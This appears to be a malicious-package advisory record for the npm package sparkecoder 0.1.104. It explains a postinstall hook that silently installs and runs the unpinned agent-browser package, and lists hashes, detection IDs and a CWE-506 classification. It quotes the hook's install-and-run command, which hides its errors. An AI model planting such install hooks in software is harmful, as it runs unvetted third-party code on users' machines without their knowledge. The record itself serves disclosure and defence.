-= Per source details. Do not edit below this line.=-
package.json declares a postinstall hook: "npm install -g agent-browser 2>/dev/null || true; agent-browser install 2>/dev/null || true". When a user runs npm install sparkecoder, this hook fetches whatever version of the separate agent-browser package is currently 'latest' on the npm registry, installs it globally (typically requiring elevated privileges), then invokes agent-browser install to run that package's own install-time logic. Both stderr and non-zero exit codes are suppressed (2>/dev/null || true), hiding any failure or error output from these commands. The behavior is undocumented in the README. Because the dependency is unpinned and pulled transitively through a side channel (not via package.json dependencies), the trust a user places in sparkecoder is silently extended to whatever agent-browser ships today and at any future moment, with no version lock and no audit trail in the dependency tree. This is the namespace-abuse shape: sparkecoder itself is small, but installing it causes attacker- or third-party-controlled code from another package to execute on the user's machine at install time, outside the normal dependency-resolution surface that lockfiles and audit tools inspect.
{
"malicious-packages-origins": [
{
"versions": [
"0.1.104"
],
"modified_time": "2026-05-21T05:44:29Z",
"sha256": "682e2efcf4c2e75d9488a35060f8f9b37ef60903150a73270dc4743f87d306a1",
"id": "IN-MAL-2026-003747",
"source": "amazon-inspector",
"import_time": "2026-05-26T05:51:14.280912863Z"
},
{
"versions": [
"0.1.104"
],
"modified_time": "2026-05-21T05:44:29Z",
"sha256": "d4e17b053b29d371301e49a703b1b6d2fba5631df4bf7b6926503a6b8bb82257",
"id": "IN-MAL-2026-003746",
"source": "amazon-inspector",
"import_time": "2026-05-26T05:51:14.163958944Z"
}
]
}
[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-WrahAR6C9NYow9zASon3vAkrt4WU5godLIdK9KL0FCL1VBiiqcrAKsfqnkY+f95nN7tghGYT6As164q7Thoc3Q==",
"sha1": "d7981d94f3540825990aff4b54a2c85c8bf910f5"
},
"filename": "sparkecoder-0.1.104.tgz"
}
],
"domains": [
"34.7.16.104.in-addr.arpa"
],
"evidence_files": [
{
"path": "package.json",
"tlsh": "0d61dd1ac9baccb32bc82594ac7b4556667248174d25bd0833c5431d8f4d2bf62fe36e",
"sha256": "a9f7627c6590faa3b2621aecbf8bf613a04f702bcbcfb3501f5311c76180163b"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sparkecoder/MAL-2026-4673.json"